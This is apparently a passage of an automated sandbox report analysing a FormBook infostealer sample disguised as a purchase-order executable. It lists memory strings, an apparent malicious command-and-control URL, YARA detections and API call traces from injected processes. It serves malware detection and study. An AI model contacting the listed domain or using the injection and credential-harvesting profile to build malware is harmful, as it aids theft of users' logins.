6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: yRUFfzlnDkMN.exe, 00000007.00000002.3549663217.00000000050E1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kalomor.top
            Source: yRUFfzlnDkMN.exe, 00000007.00000002.3549663217.00000000050E1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kalomor.top/1i25/
            Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: at.exe, 00000003.00000002.3549391269.0000000004C8E000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3548157016.000000000380E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: at.exe, 00000003.00000002.3549391269.000000000591E000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3548157016.000000000449E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
            Source: at.exe, 00000003.00000002.3546898419.000000000346F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: at.exe, 00000003.00000002.3546898419.000000000346F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: at.exe, 00000003.00000002.3546898419.000000000346F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: at.exe, 00000003.00000002.3546898419.000000000346F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033~7$
            Source: at.exe, 00000003.00000002.3546898419.000000000346F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: at.exe, 00000003.00000003.2133197584.0000000008465000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: at.exe, 00000003.00000002.3549391269.00000000047D8000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3548157016.0000000003358000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2246132315.0000000038FF8000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
            Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: at.exe, 00000003.00000002.3549391269.00000000055FA000.00000004.10000000.00040000.00000000.sdmp, at.exe, 00000003.00000002.3551318887.0000000006A40000.00000004.00000800.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3548157016.000000000417A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: at.exe, 00000003.00000003.2140934660.000000000848D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3547928511.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1844812308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3549663217.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1845706736.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3547926363.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3547928511.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1844812308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3549663217.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1845706736.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.3547926363.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C5B3 NtClose,1_2_0042C5B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472B60 NtClose,LdrInitializeThunk,1_2_03472B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03472DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03472C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034735C0 NtCreateMutant,LdrInitializeThunk,1_2_034735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03474340 NtSetContextThread,1_2_03474340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03474650 NtSuspendThread,1_2_03474650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472BE0 NtQueryValueKey,1_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472BF0 NtAllocateVirtualMemory,1_2_03472BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472B80 NtQueryInformationFile,1_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472BA0 NtEnumerateValueKey,1_2_03472BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472AD0 NtReadFile,1_2_03472AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472AF0 NtWriteFile,1_2_03472AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472AB0 NtWaitForSingleObject,1_2_03472AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472F60 NtCreateProcessEx,1_2_03472F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472F30 NtCreateSection,1_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472FE0 NtCreateFile,1_2_03472FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472F90 NtProtectVirtualMemory,1_2_03472F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472FA0 NtQuerySection,1_2_03472FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472FB0 NtResumeThread,1_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472E30 NtWriteVirtualMemory,1_2_03472E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472EE0 NtQueueApcThread,1_2_03472EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472E80 NtReadVirtualMemory,1_2_03472E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472EA0 NtAdjustPrivilegesToken,1_2_03472EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472D00 NtSetInformationFile,1_2_03472D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472D10 NtMapViewOfSection,1_2_03472D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472D30 NtUnmapViewOfSection,1_2_03472D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472DD0 NtDelayExecution,1_2_03472DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472DB0 NtEnumerateKey,1_2_03472DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C60 NtCreateKey,1_2_03472C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C00 NtQueryInformationProcess,1_2_03472C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472CC0 NtQueryVirtualMemory,1_2_03472CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472CF0 NtOpenProcess,1_2_03472CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472CA0 NtQueryInformationToken,1_2_03472CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473010 NtOpenDirectoryObject,1_2_03473010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473090 NtSetValueKey,1_2_03473090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034739B0 NtGetContextThread,1_2_034739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473D70 NtOpenThread,1_2_03473D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473D10 NtOpenProcessToken,1_2_03473D10
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B14340 NtSetContextThread,LdrInitializeThunk,3_2_03B14340
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B14650 NtSuspendThread,LdrInitializeThunk,3_2_03B14650
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_03B12BA0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03B12BF0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12BE0 NtQueryValueKey,LdrInitializeThunk,3_2_03B12BE0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12B60 NtClose,LdrInitializeThunk,3_2_03B12B60
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12AF0 NtWriteFile,LdrInitializeThunk,3_2_03B12AF0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12AD0 NtReadFile,LdrInitializeThunk,3_2_03B12AD0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12FB0 NtResumeThread,LdrInitializeThunk,3_2_03B12FB0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12FE0 NtCreateFile,LdrInitializeThunk,3_2_03B12FE0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12F30 NtCreateSection,LdrInitializeThunk,3_2_03B12F30
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_03B12E80
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12EE0 NtQueueApcThread,LdrInitializeThunk,3_2_03B12EE0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03B12DF0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12DD0 NtDelayExecution,LdrInitializeThunk,3_2_03B12DD0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_03B12D30
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12D10 NtMapViewOfSection,LdrInitializeThunk,3_2_03B12D10
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_03B12CA0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_03B12C70
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12C60 NtCreateKey,LdrInitializeThunk,3_2_03B12C60
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B135C0 NtCreateMutant,LdrInitializeThunk,3_2_03B135C0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B139B0 NtGetContextThread,LdrInitializeThunk,3_2_03B139B0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12B80 NtQueryInformationFile,3_2_03B12B80
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12AB0 NtWaitForSingleObject,3_2_03B12AB0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12FA0 NtQuerySection,3_2_03B12FA0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12F90 NtProtectVirtualMemory,3_2_03B12F90
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12F60 NtCreateProcessEx,3_2_03B12F60
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12EA0 NtAdjustPrivilegesToken,3_2_03B12EA0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12E30 NtWriteVirtualMemory,3_2_03B12E30
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12DB0 NtEnumerateKey,3_2_03B12DB0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12D00 NtSetInformationFile,3_2_03B12D00
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12CF0 NtOpenProcess,3_2_03B12CF0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12CC0 NtQueryVirtualMemory,3_2_03B12CC0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B12C00 NtQueryInformationProcess,3_2_03B12C00
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B13090 NtSetValueKey,3_2_03B13090
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B13010 NtOpenDirectoryObject,3_2_03B13010
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B13D10 NtOpenProcessToken,3_2_03B13D10
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03B13D70 NtOpenThread,3_2_03B13D70
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03228FC0 NtReadFile,3_2_03228FC0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03228E50 NtCreateFile,3_2_03228E50
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_032292B0 NtAllocateVirtualMemory,3_2_032292B0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03229150 NtClose,3_2_03229150
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_032290B0 NtDeleteFile,3_2_032290B0
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_037DFA36 NtMapViewOfSection,3_2_037DFA36
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0044EB590_2_0044EB59
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_040D26680_2_040D2668
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004185731_2_00418573
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E0631_2_0040E063
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028C01_2_004028C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028BE1_2_004028BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031E01_2_004031E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011801_2_00401180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023E01_2_004023E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EBE31_2_0042EBE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402CF01_2_00402CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FDC31_2_0040FDC3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004025A01_2_004025A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FDBA1_2_0040FDBA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041674F1_2_0041674F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004167531_2_00416753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FFE31_2_0040FFE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA3521_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F01_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035003E61_2_035003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E02741_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C02C01_2_034C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C81581_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034301001_2_03430100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA1181_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F81CC1_2_034F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F41A21_2_034F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035001AA1_2_035001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D20001_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034647501_2_03464750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034407701_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343C7C01_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345C6E01_2_0345C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034405351_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035005911_2_03500591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F24461_2_034F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E44201_2_034E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EE4F61_2_034EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FAB401_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F6BD71_2_034F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA801_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034569621_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A01_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350A9A61_2_0350A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344A8401_2_0344A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428401_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E8F01_2_0346E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034268B81_2_034268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4F401_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03482F281_2_03482F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460F301_2_03460F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E2F301_2_034E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432FC81_2_03432FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BEFA01_2_034BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440E591_2_03440E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FEE261_2_034FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FEEDB1_2_034FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452E901_2_03452E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FCE931_2_034FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344AD001_2_0344AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DCD1F1_2_034DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343ADE01_2_0343ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03458DBF1_2_03458DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440C001_2_03440C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430CF21_2_03430CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0CB51_2_034E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342D34C1_2_0342D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F132D1_2_034F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0348739A1_2_0348739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345B2C01_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E12ED1_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345D2F01_2_0345D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034452A01_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347516C1_2_0347516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342F1721_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350B16B1_2_0350B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344B1B01_2_0344B1B0
